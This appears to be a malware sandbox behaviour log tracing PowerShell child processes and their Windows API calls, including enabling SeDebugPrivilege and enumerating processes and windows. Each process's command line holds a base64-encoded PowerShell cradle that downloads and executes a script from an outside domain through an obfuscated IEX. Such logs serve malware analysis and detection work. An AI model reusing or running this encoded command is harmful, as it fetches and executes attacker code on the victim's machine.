	id = "167"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x40ad1000"
	os_pid = "0x181c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 904
	os_tid = 0x1820

	[0514.985] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 958
	os_tid = 0x19b4


Thread:
	id = 985
	os_tid = 0x1a44


Process:
	id = "168"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x410e0000"
	os_pid = "0x1854"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 912
	os_tid = 0x1858

	[0514.702] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 961
	os_tid = 0x19c4


Thread:
	id = 988
	os_tid = 0x1a50


Process:
	id = "169"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x3faed000"
	os_pid = "0x1894"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 922
	os_tid = 0x1898

	[0517.803] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 975
	os_tid = 0x1a08


Thread:
	id = 999
	os_tid = 0x1a90


Thread:
	id = 2036
	os_tid = 0x27c0


Thread:
	id = 2038
	os_tid = 0x27c8


Thread:
	id = 2042
	os_tid = 0x27d8


Thread:
	id = 2089
	os_tid = 0x2358


Process:
	id = "170"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x425fb000"
	os_pid = "0x18a8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 924
	os_tid = 0x18ac

	[0517.856] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68
	[0829.191] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0838.286] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0838.286] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0838.286] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0838.286] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0941.005] GetVersionExW (in: lpVersionInformation=0x1eda00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1eda00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0941.007] GetVersionExW (in: lpVersionInformation=0x1eda00*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1eda00*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0941.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0941.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0941.249] GetVersionExW (in: lpVersionInformation=0x1ed770*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ed770*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0941.250] SetErrorMode (uMode=0x1) returned 0x1
	[0941.251] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1ed8d0 | out: lpFileInformation=0x1ed8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0941.252] SetErrorMode (uMode=0x1) returned 0x1
	[0941.254] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1edb40 | out: lpdwHandle=0x1edb40) returned 0x94c
	[0941.256] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2e072f0 | out: lpData=0x2e072f0) returned 1
	[0941.258] VerQueryValueW (in: pBlock=0x2e072f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1edab8, puLen=0x1edab0 | out: lplpBuffer=0x1edab8*=0x2e0738c, puLen=0x1edab0) returned 1
	[0941.260] lstrlenW (lpString="䅁") returned 1
	[0941.267] VerQueryValueW (in: pBlock=0x2e072f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1eda28, puLen=0x1eda20 | out: lplpBuffer=0x1eda28*=0x2e07468, puLen=0x1eda20) returned 1
	[0941.267] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0941.269] CoTaskMemAlloc (cb=0x2e) returned 0x3899a0
	[0941.269] lstrcpyW (in: lpString1=0x3899a0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0941.270] CoTaskMemFree (pv=0x3899a0) 
	[0941.270] VerQueryValueW (in: pBlock=0x2e072f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1eda28, puLen=0x1eda20 | out: lplpBuffer=0x1eda28*=0x2e074bc, puLen=0x1eda20) returned 1
	[0941.270] lstrlenW (lpString="System.Management.Automation") returned 28
	[0941.270] CoTaskMemAlloc (cb=0x3c) returned 0x2f9020
	[0941.270] lstrcpyW (in: lpString1=0x2f9020, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0941.270] CoTaskMemFree (pv=0x2f9020) 
	[0941.270] VerQueryValueW (in: pBlock=0x2e072f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1eda28, puLen=0x1eda20 | out: lplpBuffer=0x1eda28*=0x2e07518, puLen=0x1eda20) returned 1
	[0941.270] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0941.270] CoTaskMemAlloc (cb=0x20) returned 0x38aa80
	[0941.270] lstrcpyW (in: lpString1=0x38aa80, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0941.270] CoTaskMemFree (pv=0x38aa80) 
	[0941.270] VerQueryValueW (in: pBlock=0x2e072f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1eda28, puLen=0x1eda20 | out: lplpBuffer=0x1eda28*=0x2e07558, puLen=0x1eda20) returned 1
	[0941.270] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0941.270] CoTaskMemAlloc (cb=0x44) returned 0x2f9020
	[0941.270] lstrcpyW (in: lpString1=0x2f9020, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0941.270] CoTaskMemFree (pv=0x2f9020) 
	[0941.270] VerQueryValueW (in: pBlock=0x2e072f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1eda28, puLen=0x1eda20 | out: lplpBuffer=0x1eda28*=0x2e075c0, puLen=0x1eda20) returned 1
	[0941.270] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0941.270] CoTaskMemAlloc (cb=0x76) returned 0x31f260
	[0941.270] lstrcpyW (in: lpString1=0x31f260, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0941.270] CoTaskMemFree (pv=0x31f260) 
	[0941.270] VerQueryValueW (in: pBlock=0x2e072f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1eda28, puLen=0x1eda20 | out: lplpBuffer=0x1eda28*=0x2e0765c, puLen=0x1eda20) returned 1
	[0941.271] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0941.271] CoTaskMemAlloc (cb=0x44) returned 0x2f9020
	[0941.271] lstrcpyW (in: lpString1=0x2f9020, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0941.271] CoTaskMemFree (pv=0x2f9020) 
	[0941.271] VerQueryValueW (in: pBlock=0x2e072f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1eda28, puLen=0x1eda20 | out: lplpBuffer=0x1eda28*=0x2e076c0, puLen=0x1eda20) returned 1
	[0941.271] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0941.271] CoTaskMemAlloc (cb=0x58) returned 0x33d610
	[0941.271] lstrcpyW (in: lpString1=0x33d610, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0941.271] CoTaskMemFree (pv=0x33d610) 
	[0941.271] VerQueryValueW (in: pBlock=0x2e072f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1eda28, puLen=0x1eda20 | out: lplpBuffer=0x1eda28*=0x2e0773c, puLen=0x1eda20) returned 1
	[0941.271] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0941.271] CoTaskMemAlloc (cb=0x20) returned 0x38aa80
	[0941.271] lstrcpyW (in: lpString1=0x38aa80, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0941.271] CoTaskMemFree (pv=0x38aa80) 
	[0941.271] VerQueryValueW (in: pBlock=0x2e072f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1eda28, puLen=0x1eda20 | out: lplpBuffer=0x1eda28*=0x2e073e4, puLen=0x1eda20) returned 1
	[0941.271] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0941.271] CoTaskMemAlloc (cb=0x66) returned 0x37d420
	[0941.271] lstrcpyW (in: lpString1=0x37d420, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0941.271] CoTaskMemFree (pv=0x37d420) 
	[0941.271] VerQueryValueW (in: pBlock=0x2e072f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1eda28, puLen=0x1eda20 | out: lplpBuffer=0x1eda28*=0x0, puLen=0x1eda20) returned 0
	[0941.271] VerQueryValueW (in: pBlock=0x2e072f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1eda28, puLen=0x1eda20 | out: lplpBuffer=0x1eda28*=0x0, puLen=0x1eda20) returned 0
	[0941.271] VerQueryValueW (in: pBlock=0x2e072f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1eda28, puLen=0x1eda20 | out: lplpBuffer=0x1eda28*=0x0, puLen=0x1eda20) returned 0
	[0941.271] VerQueryValueW (in: pBlock=0x2e072f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ed9f8, puLen=0x1ed9f0 | out: lplpBuffer=0x1ed9f8*=0x2e0738c, puLen=0x1ed9f0) returned 1
	[0941.272] CoTaskMemAlloc (cb=0x204) returned 0x321fd0
	[0941.272] VerLanguageNameW (in: wLang=0x0, szLang=0x321fd0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0941.273] CoTaskMemFree (pv=0x321fd0) 
	[0941.274] VerQueryValueW (in: pBlock=0x2e072f0, lpSubBlock="\\", lplpBuffer=0x1eda48, puLen=0x1eda40 | out: lplpBuffer=0x1eda48*=0x2e07318, puLen=0x1eda40) returned 1
	[0941.466] GetCurrentProcessId () returned 0x18a8
	[0941.473] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x1ec970 | out: lpLuid=0x1ec970*(LowPart=0x14, HighPart=0)) returned 1
	[0941.475] GetCurrentProcess () returned 0xffffffffffffffff
	[0941.475] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x1ec990 | out: TokenHandle=0x1ec990*=0x2d0) returned 1
	[0941.475] AdjustTokenPrivileges (in: TokenHandle=0x2d0, DisableAllPrivileges=0, NewState=0x2e0ab68*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0941.476] CloseHandle (hObject=0x2d0) returned 1
	[0941.483] EnumProcessModules (in: hProcess=0x2d0, lphModule=0x2e0abd0, cb=0x200, lpcbNeeded=0x1ed9a8 | out: lphModule=0x2e0abd0, lpcbNeeded=0x1ed9a8) returned 1
	[0941.484] GetModuleInformation (in: hProcess=0x2d0, hModule=0x13f370000, lpmodinfo=0x2e0ae40, cb=0x18 | out: lpmodinfo=0x2e0ae40*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0941.486] CoTaskMemAlloc (cb=0x804) returned 0x38baf0
	[0941.486] GetModuleBaseNameW (in: hProcess=0x2d0, hModule=0x13f370000, lpBaseName=0x38baf0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0941.486] CoTaskMemFree (pv=0x38baf0) 
	[0941.486] CoTaskMemAlloc (cb=0x804) returned 0x38baf0
	[0941.486] GetModuleFileNameExW (in: hProcess=0x2d0, hModule=0x13f370000, lpFilename=0x38baf0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0941.487] CoTaskMemFree (pv=0x38baf0) 
	[0941.487] CloseHandle (hObject=0x2d0) returned 1
	[0941.492] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x18a8) returned 0x2d0
	[0941.492] GetExitCodeProcess (in: hProcess=0x2d0, lpExitCode=0x1edad8 | out: lpExitCode=0x1edad8*=0x103) returned 1
	[0941.495] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12e0b088, Length=0x20000, ResultLength=0x1edaa0 | out: SystemInformation=0x12e0b088, ResultLength=0x1edaa0*=0x4a000) returned 0xc0000004
	[0941.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12e2b0b8, Length=0x4c800, ResultLength=0x1edaa0 | out: SystemInformation=0x12e2b0b8, ResultLength=0x1edaa0*=0x4a050) returned 0x0
	[0941.768] EnumWindows (lpEnumFunc=0x2bb66ac, lParam=0x0) 
	[0941.770] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x4d0
	[0941.771] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x558
	[0941.771] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x4d0
	[0941.771] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x4d0
	[0941.771] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x4d0
	[0941.771] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x538
	[0941.771] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x4d0
	[0941.771] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x778
	[0941.771] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x778
	[0941.771] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x4d0
	[0941.771] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x4d0
	[0941.771] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x4d0
	[0941.771] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x4d0
	[0941.771] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x4d0
	[0941.772] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x4d0
	[0941.772] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x4d0
	[0941.772] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x4d0
	[0941.772] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x460
	[0941.772] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x4d0
	[0941.772] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x4d0
	[0941.772] GetWindowThreadProcessId (in: hWnd=0x10bd6, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x2440
	[0941.772] GetWindowThreadProcessId (in: hWnd=0x10bb6, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x24d8
	[0941.772] GetWindowThreadProcessId (in: hWnd=0x10ba8, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1aa4
	[0941.772] GetWindowThreadProcessId (in: hWnd=0x10b74, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1ff0
	[0941.772] GetWindowThreadProcessId (in: hWnd=0x10b66, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1a84
	[0941.772] GetWindowThreadProcessId (in: hWnd=0x10b62, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1fb0
	[0941.773] GetWindowThreadProcessId (in: hWnd=0x10b5e, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1e10
	[0941.773] GetWindowThreadProcessId (in: hWnd=0x10b52, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x23a8
	[0941.773] GetWindowThreadProcessId (in: hWnd=0x20b46, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1f24
	[0941.773] GetWindowThreadProcessId (in: hWnd=0x20b3c, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x21ec
	[0941.773] GetWindowThreadProcessId (in: hWnd=0x20b32, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x2320
	[0941.773] GetWindowThreadProcessId (in: hWnd=0x10b28, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1fd4
	[0941.773] GetWindowThreadProcessId (in: hWnd=0x10b0c, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1880
	[0941.773] GetWindowThreadProcessId (in: hWnd=0x10af6, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1b18
	[0941.773] GetWindowThreadProcessId (in: hWnd=0x10aea, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1d6c
	[0941.773] GetWindowThreadProcessId (in: hWnd=0x10ade, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x233c
	[0941.773] GetWindowThreadProcessId (in: hWnd=0x10ad2, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x2368
	[0941.773] GetWindowThreadProcessId (in: hWnd=0x10ace, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x2124
	[0941.774] GetWindowThreadProcessId (in: hWnd=0x10aca, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x22f0
	[0941.774] GetWindowThreadProcessId (in: hWnd=0x10ac4, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x22ac
	[0941.774] GetWindowThreadProcessId (in: hWnd=0x30932, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x1cdc
	[0941.774] GetWindowThreadProcessId (in: hWnd=0x308c2, lpdwProcessId=0x1ed800 | out: lpdwProcessId=0x1ed800) returned 0x10f0
